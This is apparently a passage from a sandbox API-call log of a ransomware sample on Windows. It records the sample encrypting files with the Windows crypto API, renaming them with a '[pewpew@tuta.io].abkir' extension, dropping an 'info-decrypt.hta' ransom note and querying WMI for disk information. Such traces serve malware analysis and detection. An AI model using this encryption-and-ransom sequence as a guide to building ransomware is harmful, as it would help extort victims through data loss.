ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1d839cc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0164.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0164.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0164.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0164.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0164.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0164.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6e68c0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1b6e68c0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1b6e68c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0164.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0164.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0164.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0164.109] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), fInfoLevelId=0x0, lpFileInformation=0x36da6c4 | out: lpFileInformation=0x36da6c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8)) returned 1 [0164.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0164.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0164.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0164.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0164.109] GetFileType (hFile=0x45c) returned 0x1 [0164.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0164.110] GetFileType (hFile=0x45c) returned 0x1 [0164.110] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x1de8 [0164.110] ReadFile (in: hFile=0x45c, lpBuffer=0x38a6e90, nNumberOfBytesToRead=0x1de8, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x38a6e90*, lpNumberOfBytesRead=0x6d8edac*=0x1de8, lpOverlapped=0x0) returned 1 [0164.177] CloseHandle (hObject=0x45c) returned 1 [0164.177] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xb1e730) returned 1 [0164.178] CryptGenRandom (in: hProv=0xb1e730, dwLen=0x10, pbBuffer=0x38a8fcc | out: pbBuffer=0x38a8fcc) returned 1 [0167.231] CryptImportKey (in: hProv=0xb1e730, pbData=0x368910c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f950) returned 1 [0167.231] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.232] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.232] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f510) returned 1 [0167.232] CryptContextAddRef (hProv=0xb1e730, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.232] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x4, pbData=0x36891ec*=0x1, dwFlags=0x0) returned 1 [0167.232] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x1, pbData=0x36891b8, dwFlags=0x0) returned 1 [0167.232] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36891fc*, pdwDataLen=0x6d8ed78*=0x1df0, dwBufLen=0x1df0 | out: pbData=0x36891fc*, pdwDataLen=0x6d8ed78*=0x1df0) returned 1 [0167.232] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x368b010*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x368b010*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0167.234] CryptDestroyKey (hKey=0xb7f950) returned 1 [0167.234] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0167.234] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0167.234] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0167.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0167.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0167.331] GetFileType (hFile=0x208) returned 0x1 [0167.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0167.332] GetFileType (hFile=0x208) returned 0x1 [0167.332] WriteFile (in: hFile=0x208, lpBuffer=0x368b62c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x368b62c*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0167.333] CloseHandle (hObject=0x208) returned 1 [0167.333] CoTaskMemAlloc (cb=0x20c) returned 0x66ca998 [0167.334] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66ca998 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0167.334] CoTaskMemFree (pv=0x66ca998) [0167.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0167.334] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0167.334] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0167.334] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0167.334] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.335] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027590) returned 0x0 [0167.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0167.335] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027590, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030b70) returned 0x0 [0167.336] WbemDefPath:IUnknown:Release (This=0x6027590) returned 0x0 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030b70) returned 0x0 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0167.336] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ce2f8) returned 0x0 [0167.336] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce2f8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.336] WbemDefPath:IUnknown:Release (This=0x66ce2f8) returned 0x3 [0167.336] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0167.336] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0167.336] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0167.336] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0167.336] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0167.336] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0167.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030b70) returned 0x0 [0167.337] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0167.337] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0167.337] WbemDefPath:IWbemPath:SetText (This=0x6030b70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0167.337] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.337] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0167.337] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0167.337] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0167.337] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.338] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027690) returned 0x0 [0167.338] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0167.338] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027690, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6030be0) returned 0x0 [0167.339] WbemDefPath:IUnknown:Release (This=0x6027690) returned 0x0 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6030be0) returned 0x0 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0167.339] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66ce228) returned 0x0 [0167.339] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce228, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.339] WbemDefPath:IUnknown:Release (This=0x66ce228) returned 0x3 [0167.339] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0167.339] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0167.339] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0167.339] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0167.339] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0167.339] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0167.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6030be0) returned 0x0 [0167.340] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0167.340] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0167.340] WbemDefPath:IWbemPath:SetText (This=0x6030be0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0167.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0167.340] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0167.340] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.340] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0167.340] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0167.340] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0167.340] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.341] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6023ac8) returned 0x0 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x6023ac8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0167.341] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023ac8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60276a0) returned 0x0 [0167.341] WbemLocator:IUnknown:Release (This=0x6023ac8) returned 0x0 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60276a0) returned 0x0 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0167.341] WbemLocator:IUnknown:AddRef (This=0x60276a0) returned 0x3 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, 